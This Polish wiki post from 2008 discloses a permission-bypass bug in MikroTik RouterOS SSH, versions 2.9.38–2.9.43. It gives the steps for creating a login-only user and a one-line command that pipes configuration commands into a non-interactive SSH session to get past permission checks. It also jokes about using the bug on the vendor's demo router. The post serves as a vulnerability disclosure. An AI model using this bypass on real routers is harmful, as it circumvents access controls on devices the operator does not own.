modified on 10 sty 2008 at 10:30 ••• 8 966 views

Metody Hackowania Mikrotika

Z MikroTik Wiki

Witam,

Odkryłem małego (albo i nie) buga w oprogramowaniu Mikrotik, a dokładniej w module ssh, który pozwala mając dostęp do powłoki na dowolne modyfikacje konfiguracji, nie posiadając odpowiednich uprawnień. Błąd zgłosiłem dokładnie 15.04.2007 dostałem odpowiedź, że został potwierdzony, ale od tamtego czasu nic nie zostało naprawione i występuje on również w najnowszej wersji.

1. Potrzebujemy użytkownika, do którego mamy dostęp.

Powiedzmy, że wykonaliśmy taki kod:

Kod: / user group add name="server" policy=ssh,!local,!telnet,!ftp,!reboot,!read,!write,!policy,!test,!win\

   box,!password,!web

/ user add name="imbug" group=server comment="" disabled=no


Jak widać jeśli chodzi o uprawnienia, możemy się tylko zalogować.

2. Teraz aby wykonać dowolną komendę wystarczy połączyć sie z serwerem ssh wyłączając interaktywną powłokę.

Np.:

Kod: $ echo "/ system backup save" | ssh -C -T imbug@192.168.10.15 Configuration backup saved


Ale, jeśli użyje "normalnego" połączenia wszystko jest tak jak powinno być, tzn:

Kod: $ ssh -C imbug@192.168.10.15 [...cut...] Terminal xterm detected, using multiline input mode [imbug@Mikrotik] > system backup save Saving system configuration Failed to save system configuration backup not enough permissions (9)


Na wszystkich mikrotikach posiadam level 4 na PC, z moich testów wynika, że występuje on na pewno na następujących wersjach:

Kod: 2.9.38, 2.9.39, 2.9.40, 2.9.41, 2.9.42, 2.9.43


Fajnie by było jakby ktoś sprawdził to też na RB i na starszych wersjach.

Według mnie jest to dosyć poważny problem, bez problemów dzięki temu "schackować" demo, dostępne przez stronę Mikrotika Wink.

Pozdrawiam, Kamil "ayufan" Trzciński.